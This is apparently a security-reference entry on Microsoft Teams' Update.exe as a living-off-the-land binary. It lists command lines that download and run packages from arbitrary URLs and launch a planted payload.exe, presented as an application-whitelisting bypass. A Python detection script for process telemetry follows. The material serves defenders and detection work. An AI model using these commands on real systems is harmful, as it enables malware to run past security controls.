.. / Update.exe

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.


Paths:


Resources:
https://www.youtube.com/watch?v=rOP3hnkj7ls
https://twitter.com/reegun21/status/1144182772623269889
https://twitter.com/MrUn1k0d3r/status/1143928885211537408
http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56

Acknowledgement:
Reegun J (OCBC Bank) - @reegun21
Mr.Un1k0d3r - @MrUn1k0d3r
Adam - @Hexacorn


Detection:
Update.exe spawned an unknown process



Download

Update.exe goes to the given URL, looks for a RELEASES file, and downloads the NuGet package.
Update.exe --download [url to package]
Usecase: Download binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
Mitre: T1218



AWL bypass

Update.exe goes to the given URL, looks for a RELEASES file, then downloads and installs the NuGet package.
Update.exe --update [url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
Mitre: T1218



Update.exe goes to the given URL, looks for a RELEASES file, then downloads and installs the NuGet package.
Update.exe --updateRollback=[url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
Mitre: T1218



Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Update.exe --processStart payload.exe --process-start-args "whatever args"
Usecase: Application Whitelisting Bypass
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
Mitre: T1218



Execute

Update.exe goes to the given URL, looks for a RELEASES file, then downloads and installs the NuGet package.
Update.exe --update [url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
Mitre: T1218



Update.exe goes to the given URL, looks for a RELEASES file, then downloads and installs the NuGet package.
Update.exe --updateRollback=[url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
Mitre: T1218



Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Update.exe --processStart payload.exe --process-start-args "whatever args"
Usecase: Execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
Mitre: T1218
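

The Detection note above (Update.exe spawned an unknown process) and the command lines listed on this page can be checked together in process-creation telemetry. The Python below is an added example, not part of the original entry; the event field names, the allowlisted host `updates.example.internal`, the expected child names and the sample events are assumptions constructed for illustration.

```python
import ntpath
import re
from urllib.parse import urlsplit

# Flags from this page that make Update.exe fetch a package from a URL.
REMOTE_FLAG = re.compile(r'--(download|updateRollback|update)[=\s]+"?(https?://[^\s"]+)', re.I)
# Flag from this page that makes Update.exe start a named executable.
PROCESS_START = re.compile(r'--processStart[=\s]+"?([^\s"]+)', re.I)

# Assumptions: tune both sets to what is normal in your environment.
EXPECTED_HOSTS = {"updates.example.internal"}    # placeholder update host
EXPECTED_CHILDREN = {"teams.exe", "update.exe"}  # children of a normal update run


def findings(event):
    """Return the reasons a process-creation event involving Update.exe looks abnormal."""
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event.get("parent_image", "")).lower()
    cmd = event.get("command_line", "")
    out = []
    if image == "update.exe":
        m = REMOTE_FLAG.search(cmd)
        if m:
            host = (urlsplit(m.group(2)).hostname or "").lower()
            if host not in EXPECTED_HOSTS:
                out.append(f"remote package via --{m.group(1)} from {host}")
        m = PROCESS_START.search(cmd)
        if m and ntpath.basename(m.group(1)).lower() not in EXPECTED_CHILDREN:
            out.append(f"--processStart target {m.group(1)}")
    if parent == "update.exe" and image not in EXPECTED_CHILDREN:
        out.append(f"unknown child {image}")
    return out


# Constructed sample events (not real telemetry); the paths are illustrative.
TEAMS = r"C:\Users\alice\AppData\Local\Microsoft\Teams"
SAMPLE_EVENTS = [
    {"image": TEAMS + r"\Update.exe", "command_line": 'Update.exe --processStart "Teams.exe"'},
    {"image": TEAMS + r"\Update.exe", "command_line": "Update.exe --update http://203.0.113.10/pkg"},
    {"image": TEAMS + r"\Update.exe", "command_line": "Update.exe --updateRollback=http://203.0.113.10/pkg"},
    {"image": TEAMS + r"\Update.exe", "command_line": 'Update.exe --processStart payload.exe --process-start-args "x"'},
    {"image": TEAMS + r"\current\payload.exe", "parent_image": TEAMS + r"\Update.exe", "command_line": "payload.exe x"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["command_line"], "->", findings(ev) or "ok")
```

The same two conditions (an Update.exe command line carrying a URL outside the allowlist, and a child of Update.exe outside the expected set) translate directly into a SIEM or EDR rule over process-creation events.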